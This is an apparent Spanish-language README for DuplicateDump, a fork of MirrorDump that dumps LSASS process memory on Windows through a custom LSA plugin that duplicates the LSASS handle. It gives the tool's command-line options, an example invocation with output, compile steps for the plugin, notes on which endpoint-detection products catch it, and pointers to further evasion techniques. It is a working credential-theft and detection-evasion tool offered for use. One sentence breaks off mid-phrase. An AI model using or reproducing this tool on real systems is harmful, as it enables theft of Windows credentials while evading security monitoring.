
Volcado de LSASS con un handle duplicado desde un plugin LSA personalizado
DuplicateDump es un fork de MirrorDump con las siguientes modificaciones:
DuplicateDump agrega un plugin de LSA personalizado que duplica el identificador del proceso LSASS desde el proceso LSASS a DuplicateDump. Así, DuplicateDump tiene un identificador de proceso listo para usar hacia LSASS sin invocar OpenProcess.
Al cargar DuplicateDump en memoria, pudo volcar la memoria de LSASS sin detección en
Detectado por Cortex XDR, Crowdstrike. No pudo volcar lsass sin detección en SentinalOne.
Compile el plugin de LSA (exporte la función SpLsaModeInitialize o dllMain) y proporcione la ruta completa de la DLL a DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this help
Example
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
DuplicateDump usa DInvoke para llamar a la API AddSecurityPackage y cargar un plugin de LSA. Podría usar una llamada RPC sin tener que invocar esa API directamente. Consulte los detalles en la publicación del blog de XPN.
Recientemente, splinter_code descubrió que SecLogon podría aprovecharse para volcar LSASS. Recomiendo encarecidamente que estudie su publicación del blog.